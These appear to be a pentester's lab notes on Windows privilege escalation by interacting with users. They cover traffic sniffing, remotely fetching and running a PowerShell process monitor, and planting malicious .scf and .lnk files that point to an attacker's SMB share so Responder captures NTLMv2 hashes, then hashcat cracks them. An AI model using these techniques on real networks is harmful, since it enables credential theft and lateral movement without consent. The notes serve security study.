Skip to content

Interacting with Users

  • Once we have exhausted all options, we can look at specific techniques to steal credentials from an unsuspecting user by sniffing their network traffic/local commands or attacking a known vulnerable service requiring user interaction. One of my favorite techniques is placing malicious files around heavily accessed file shares in an attempt to retrieve user password hashes to crack offline later.

Traffic Capture - Wireshark

  • If Wireshark is installed, unprivileged users may be able to capture network traffic, as the option to restrict Npcap driver access to Administrators only is not enabled by default.
  • Also, suppose our client positions us on an attack machine within the environment. In that case, it is worth running tcpdump or Wireshark for a while to see what types of traffic are being passed over the wire and if we can see anything interesting.
  • The tool net-creds can be run from our attack box to sniff passwords and hashes from a live interface or a pcap file. It is worth letting this tool run in the background during an assessment or running it against a pcap to see if we can extract any credentials useful for privilege escalation or lateral movement.

Process Command Lines

Monitoring for Process Command Lines

  • create the below as procmon1.ps1 on KALI and start the http.server 
    while($true)
{

  $process = Get-WmiObject Win32_Process | Select-Object CommandLine
  Start-Sleep 1
  $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
  Compare-Object -ReferenceObject $process -DifferenceObject $process2

}
  • Running the monitor script on target
    • IEX (iwr 'http://10.10.10.205/procmon.ps1')

Vulnerable Services

  • Docker Desktop Community Edition before 2.1.0.1 - https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e

SCF on a File Share

Malicious .scf File

  • create a file @Inventory.scf .
    • the @ will force the file to be on top when Windows Explorer is opened
    • point to our KALI machine with a random share name and .ico
  • Place the file in a share/directory where our target user (eg: ADMIN) might visit
  • To search for directories our current user has access to: [18/1/NEEDED COMMANDS] 
    [Shell]
Command=2
IconFile=\\10.10.14.6\share\legit.ico
[Taskbar]
Command=ToggleDesktop
  • start responder on kali
    • sudo responder -wrf -v -I tun0
    • wait 2-5 minutes for the "user" to browse the share after starting Responder.
    • We'll receive a NTLMv2-SSP Hash : Administrator::WINLPE-SRV01:815c504e7b06
  • cracking with hashcat
    • hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt

Capturing Hashes with a Malicious .lnk File

  • Using SCFs no longer works on Server 2019 hosts, but we can achieve the same effect using a malicious .lnk file.
  • We can use various tools to generate a malicious .lnk file, such as Lnkbomb, as it is not as straightforward as creating a malicious .scf file. We can also make one using a few lines of PowerShell: 
    $objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()